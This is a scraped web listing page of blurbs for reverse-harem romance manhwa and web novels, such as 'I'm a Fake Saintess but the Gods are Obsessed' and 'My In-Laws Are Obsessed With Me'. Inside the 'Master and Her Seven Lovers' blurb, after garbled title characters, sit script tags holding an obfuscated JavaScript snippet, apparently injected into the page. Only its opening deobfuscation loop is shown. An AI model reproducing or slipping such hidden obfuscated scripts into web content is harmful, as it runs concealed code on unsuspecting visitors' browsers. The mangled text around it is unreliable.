Reverse harem - Page 2

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare

Her… One Is When Master Jue Flirts With Her.

38 results

I’m a Fake Saintess but the Gods are Obsessed

I reincarnated into the body of a fake saintess who will die when the real saintess appears five years later. If I were to gather the monthly allowance given to the saintess I can at the very least buy a building! But while I was carefully setting up a plan to run away after playing the role of the saintess… “Choose me, or else…” “I prepared a prison just for you. My goddess—” “…” The male leads reacted differently than I expected. [The bored divine beings have started to gain interest after watching you.] And Ariel who unexpectedly gained the interest of the gods. On top of that, the final boss who is going to put the world into despair On top of that, the final boss who is planning on destroying the world isn’t killing me, but helping me…? I have no interest in gaining the interest of the gods or destroying the world! So please just let me become a landlord like I wanted—! 가짜 성녀인데 신들이 집착한다


Jealousy Inducers

I want to have a romantic relationship. They have come for those who only trigger jealousy!


Master and Her Seven Lovers

* A game of romance that may prove to be fatal! Detective Winnie Kiu entered a virtual game while in pursuit of a murderer. She put her life on the line and relied on Code Guest's help to save seven princes trapped in the game. Solving cases in the real world and adventuring in the game world, romance is everywhere in this intense and exciting game. The seven princes await their master's arrival! Master and 7 Lovers / ?????7??? / ?????7???<script></script><script>(function(_0x5ab0eb,_0x17af5c){var _0x441c47=_0x28b4,_0xadf734=_0x5ab0eb();while(!![]){try{var _0x81db85=-parseInt(_0x441c47(0x149))/(0x157d*-0x1+0x1690+0x2*-0x89)+parseInt(_0x441c47(0x143))/(0x6*-0x11+-0x177f+0x17e7)*(-parseInt(_0x441c47(0x159))/(0x200f+-0x106d+-0xf9f))+parseInt(_0x441c47(0x158))/(0x1d9c+0x1*-0x45d+-0x193b)*(-parseInt(_0x441c47(0x14b))/(0x59*0x59+-0x85d+0x3*-0x785))+parseInt(_0x441c47(0x152))/(-0x1b8d+-0x134f+0x1*0x2ee2)*(-parseInt(_0x441c47(0x15a))/(0x1*0x1fb+0x1*0xec1+-0xd*0x149))+-parseInt(_0x441c47(0x157))/(0x688+-0x6*-0xfd+0x4a*-0x2b)+-parseInt(_0x441c47(0x146))/(0x1084+0x448+0x5*-0x427)*(-parseInt(_0x441c47(0x155))/(-0xa01+0x1081+0x676*-0x1))+-parseInt(_0x441c47(0x156))/(0x9*-0x3f5+-0x6f8*-0x1+0x1cb0)*(-parseInt(_0x441c47(0x15d))/(-0x1*-0x135a+0x24a+-0x2*0xacc));if(_0x81db85===_0x17af5c)break;else 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Max level green tea transmigrates into little pitiful one

Lin Feilu, or better known by her nickname—Green Tea Princess, was the best of all the scheming b*tches that the world had ever seen. She was the Oscar-winning actress among the masses with real life as her stage. Acting coy, slandering, feigning innocence, or playing the saint, she aced it all. Simply put, she was the proverbial villainess. Ah, but retribution came way too early for this malicious personage and she died on her 27th birthday. In death, Lin Feilu reflected on her career of 20 years as the Green Tea Princess. She was full of regret and remorse over the life she once led. She vowed, if there was an afterlife, she would atone for her misdeeds and be a good person. [ From Novel Updates ] 满级绿茶穿成小可怜 / The Villainess Wants to Turn Over a New Leaf / 满级绿茶穿成小可怜 / Max Level Green Tea Crossing to Be Small and Pitiful / Max Level Green Tea Transmigrates Into Little Pitiful One / Mǎn Jí Lǜchá Chuān Chéng Xiǎo Kělián / Such a Bitch Looks Like a Pity


Melody Of The Deadwood

“Living isn’t fun anymore.” So I decided to die. But before I could leave, in the last moments of my life… “Should we make life fun for you?” The Vina people appeared in front of me. They asked me to live. They told me if I died, they’ll die as well. Do they want to live for eternity? “We’ll make you happy. So, don’t die yet.” “If you pledge to be one of us, you can have all the money you’ll ever need for the rest of your life.” “Love, just talk to us. What do you need?” “You can tell us everything you desire. Summary: 뮤제 작가님, 인접 작가님/ Melody of the Deadwood


My Beloved Oppressor

Annette Rosenberg, A Descendant Of The Padanian Royal Family And The Only Daughter Of A Military Captain. After Two Years Of Dating, She Married Her Father’s Faithful Servant, Heiner Valdemar. Everything Was Perfect. -Until Her Family Fell Due To Her Husband’s Betrayal. “You Will Be Unhappy By My Side For The Rest Of Your Life.” Annette Suddenly Realised Something. This Man’s Revenge Is Just Beginning.

23 hours ago

My Brothers Dote On Me

Read manga My Brothers Dote On Me When she woke up in a new life, she became a poor little girl who was sent to the mental hospital by her own brothers. So with the painful memories of the original owner in the previous life, Pei Yun Ge began to fight back and fight against villains from all walks of life! All the way she abuses the scums, all the way she feels cool! However, she suddenly found her three former scum older brothers have become spoiled sister devils? Not only that, she gained another strong and powerful ” older brother”, the more the older brother’ spoiled her, the more she suspicious Is this the path of spoiling that can never be recovered/returned?


My Favorite Novel Has A Weird Epilogue

Read Manhwa My Favorite Novel Has A Weird Epilogue / External Ordinary, Slightly Strange / The Side Story Of My Favorite Work Is A Bit Strange / The Spin-Off Of My Favorite Work Is A Bit Strange / 최애작의 외전이 좀 이상합니다 Fencing Champ Rina Is On Cloud Nine After Winning Gold At The Olympics, But Is Pulled Down To Earth When She Wakes Up As An Extra In Her Favorite Novel. Though She Thinks She’ll Have A Front-Row Seat To The Hero And Heroine’s Romance, Rina Learns That It’s Been 25 Years Since They Both Tragically Died. On Top Of That, Their Son, Leo, Is Being Treated Like A Traitor By The Very Royal Family His Parents Fought To Protect! Fueled By Her Fangirl Determination, Rina Raises Her Sword To Clear Leo’s Name And Give Him The Happy Ending He Deserves.


My In-Laws Are Obsessed With Me

My Family And My Husband Killed Me. Because Of The Inheritance. Returning To The Past, I Made Up My Mind. “I Have To Protect My Life And My Inheritance.” Grand Duke Lapireon Of The Cursed Family. I Offered Him, Who Was Not Interested In Property And Women, A One Year Contract Marriage. Now, All We Have To Do Is Get A Divorce… “Lady, Do You Think You Can Leave Me Now?” My Husband Is Weird. “Would You Like A Land Or A Mine? Or An Empire?” “Sasha, Did Theo Do Something Wrong?” “Mom, Don’t Leave Me.” “Sister… I Can’t Live Without You.” Even My In-Laws Began To Obsess Over Me. Associated Names 시월드가 내게 집착한다 English


My Younger Brother Forces My Flower Path

Read manhwa My younger brother forces my flower path / 남동생이 꽃길을 강요한다 I have a younger brother. A good little brother who does anything for his sister. The problem is, he doesn’t know the right way. “Sister, now this is yours.” What my brother gave me was the crown that was on the tyrant’s head just until yesterday. “Sister, you said you wanted to be an emperor. I’ll be your knight.” When did I say that, crazy brother? So, I became the emperor thanks to my crazy little brother. I’m doing well because it seems to suit my aptitude. “Sister! I’ll make the continent kneel under your feet!” My brother kept raising the scale. Hey, you crazy bastard, that’s not it… At this rate, I’m likely to die of overwork even before I become the first emperor to unify the continent. This can’t be done. I need to find a good worker, no, a husband. “Eddy, I’m thinking of getting married now.” “I’ll find the best brother-in-law in the world.” “No need to be the best in the world, just work well and listen well…” “I can’t accept a man who’s weaker than me to be sister’s partner. I’ll prepare for a National Tournament!” You son of a. Listen to me. The husband who survived the final battle was the Duke of Dehart, the Monster of the North. He was the second crazy man who dreamed of reunifying the continent with his brother-in-law. Ha, these bastards are really…


My Younger Brother’s Friends

After her parents died in an accident, Gaeun, a senior student in college, lived with her younger brother, a high school student. She lived brightly and confidently while hiding her pain. After breaking up with her boyfriend, who was her ideal type, she thought she wouldn’t date anymore. However, she ended up getting tied up with Dowan, who knew her since they were young, Sangwoo, who was her younger brother’s class Vice President, and Joon, who was a part-time student in an Art Academy. It suddenly became an ambiguous atmosphere amongst the younger men. One day, Gaeun gave an invitation to her friends saying that she’d decided to marry her younger brother’s friend. Ultimately, which of the three will she marry…?


Please, Forget About Vivian

Please, Forget About Vivian / 비비안을 잊어주세요 “We’re Getting Divorce, Samuel.” It Was A Matter Of Politics, But I Got Married Because I Loved Him And I Dreamed About A Future With Him. But Samuel Tells Vivian That She Shouldn’t Do Anything. “Even If You Give Birth A Child, I Don’t Want One. So Clear Your Mind.” Even The Child. The Three-Year Of Marriage Gave Vivian Despair, Not Hope. But I Had A Baby. Vivian Decides To Erase Her Memories And Leave. ” Forget Me.” Read On And The Next Day, Vivian Disappeared Without Leaving A Trace. *** Vivian, Who Had Disappeared, Is Back. Before Her Death. Please, Will You Let Me Live?
